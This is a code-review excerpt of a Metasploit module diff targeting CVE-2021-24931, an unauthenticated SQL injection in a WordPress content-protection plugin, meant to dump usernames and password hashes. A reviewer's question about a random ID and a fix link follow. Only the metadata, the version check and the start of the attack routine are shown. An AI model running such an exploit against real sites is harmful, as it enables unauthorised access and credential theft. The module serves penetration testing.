modules/auxiliary/scanner/http/wp_secure_copy_content_protection_sqli.rb

```diff
@@ -0,0 +1,112 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Secure Copy Content Protection and Content Locking sccp_id Unauthenticated SQLi',
+        'Description' => %q{
+          Secure Copy Content Protection and Content Locking, a WordPress plugin,
+          prior to 2.8.2 is affected by an unauthenticated SQL injection via the
+          'sccp_id[]' parameter.
+        },
+        'Author' => [
+          'h00die', # msf module
+          'Hacker5preme (Ron Jost)', # edb
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-24931'],
+          ['URL', 'https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md'],
+          ['EDB', '50733'],
+          ['WPVDB', '1cd52d61-af75-43ed-9b99-b46c471c4231'],
+        ],
+        'Actions' => [
+          ['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }]
+        ],
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2021-11-08',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 3])
+    ]
+  end
+
+  def check_host(_ip)
+    unless wordpress_and_online?
+      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
+    end
+
+    checkcode = check_plugin_version_from_readme('secure-copy-content-protection', '2.8.2')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      return Msf::Exploit::CheckCode::Safe('Secure Copy Content Protection and Content Locking version not vulnerable')
+    end
+
+    print_good('Vulnerable version of Secure Copy Content Protection and Content Locking detected')
+    checkcode
+  end
+
+  def run_host(ip)
+    id = Rex::Text.rand_text_numeric(1)
```

Comment:
Does this have to be a single digit number? Are we 100% sure this can't be a large number? Just checking.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/16182/commits/9b53ed5f5c6cae16b262d6effa8aa3a376b1b640